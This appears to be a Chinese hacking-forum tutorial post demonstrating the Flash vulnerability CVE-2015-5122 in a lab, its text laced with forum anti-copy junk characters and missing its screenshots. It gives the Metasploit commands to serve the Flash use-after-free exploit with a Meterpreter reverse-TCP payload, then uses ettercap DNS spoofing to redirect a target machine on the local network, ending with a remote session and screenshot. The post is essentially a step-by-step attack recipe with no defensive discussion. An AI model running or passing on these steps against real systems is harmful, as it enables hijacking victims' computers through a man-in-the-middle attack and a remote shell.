找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1546|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

7 Q. |% r! n1 ` 二、cve2015-5122漏洞实例演示虚拟机 ( N$ c: `% S; X! t; q

: L! i5 g; Y6 q, c. A. |2 Z2 S+ _; q/ k

; ], N9 ? {5 I+ R4 b8 ?. J! C0 O   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ; ~" X( i" b2 w

' J' D7 d8 n9 C

7 K! i2 m$ |# c; W' N3 | search cve-2015-5122如图: 3 n3 s, J/ f+ e7 E" b: \

; `; Y( ^) T+ K

! ^2 B' X1 ^1 Q0 ~9 R- Q9 O   ; H1 h: C% ]3 b$ F; ~# k0 j2 p

3 l% `0 n2 e/ H! b- ], c

- p+ O- |: Z0 p; n, f* T; Q# D: Z 下面我们敲如下命令: " _1 b& A3 t. `2 u. j0 e

. v+ t1 o J+ C3 l- H, g

! t! J, @0 p, \8 O$ d* X use exploit/multi/browser/adobe_flash_opaque_background_uaf ; b6 p1 [3 I: K. W, _

: Q$ t _" G: b! V+ J/ r ^ l, ?! a

& ?: o9 J0 r; t: w' U5 w set PAYLOAD windows/meterpreter/reverse_tcp # ]! R2 L/ [( e

o9 X9 D7 H4 F; ?

, t# { c! Z8 g/ H& J: [; h) l* x set LHOST 192.168.0.109 : ~ _' N$ p/ f3 K$ R4 x) p; u

- F: s* r' C( Z% f' b# z6 R

4 K. ^% w7 K' B* |1 S0 ?3 ^& b3 b% x set URIPATH /                        /*根目录*/ % c1 S6 O5 W4 ~. p, `6 F

% E; T) e, k7 N6 u

$ o% `8 X: ^5 d: }# A% a8 G( } set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 $ g) x! y/ ^1 a

, [ \* Q/ v/ Q/ K# J) W# @3 n

# t* P0 G( G0 X! X/ Y set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 + p) t* Z% }; I/ G

0 D) O3 _. L- l) n2 M+ p

. v( D8 l- U' H+ A! V% ] 然后show options如图: " s& K' J7 i+ `6 g, M

4 K# p& o8 \" ]- A/ j

, R* }4 {" b K: ~; F9 D   : q0 v* B$ @! ^* G4 B3 ^" M

2 ~& G# _$ X O% k! u( l' l

" k9 O+ T/ O' I0 M2 a 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
8 x; l7 D7 y* l
' @5 U6 U; [, P0 O% R

% r* q4 P/ ?( B$ k0 g+ ^% N

. f7 F+ w* A! F7 V 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 ; n# W: r3 A8 \

0 |9 r N Q' H$ o& j' o: l0 k, j& G

, R, t* `4 ?& X* T! o. Q* \% @ Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf : E6 g! Y( _0 c! E# b: U: o

) F1 G- ~* q% E4 v5 b" _) i' I

+ t$ m% @# H0 a; i- f" k% E   9 c, T# H1 h3 Q L( L! L" Q

' w: A0 m5 B. c6 T- N

9 G+ F9 R; e w- p# O* W8 Z 成功了,这时候我们断开ettercap,如图: # a% c5 \8 n& |* d4 E4 b( C/ b

2 ~4 e6 x+ X) x8 l7 B" _

8 q( V% M+ p: v) O8 I$ P   : d; _, _8 k; t u; q3 {

$ m! K! Z( _1 ]' x! }" \8 p+ X8 |

' N0 d+ F/ o) g: }$ p Screenshot如图: 2 O: F3 }" ? [4 |$ G0 u, s

, T6 H, f' h6 J C

" v7 I5 c) l) b5 l   ; ]4 `3 ?2 [7 M

6 F3 U |3 }0 _$ k

# z6 C0 G- F+ h0 P; } 9 i4 b v @5 x1 t( @' T

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表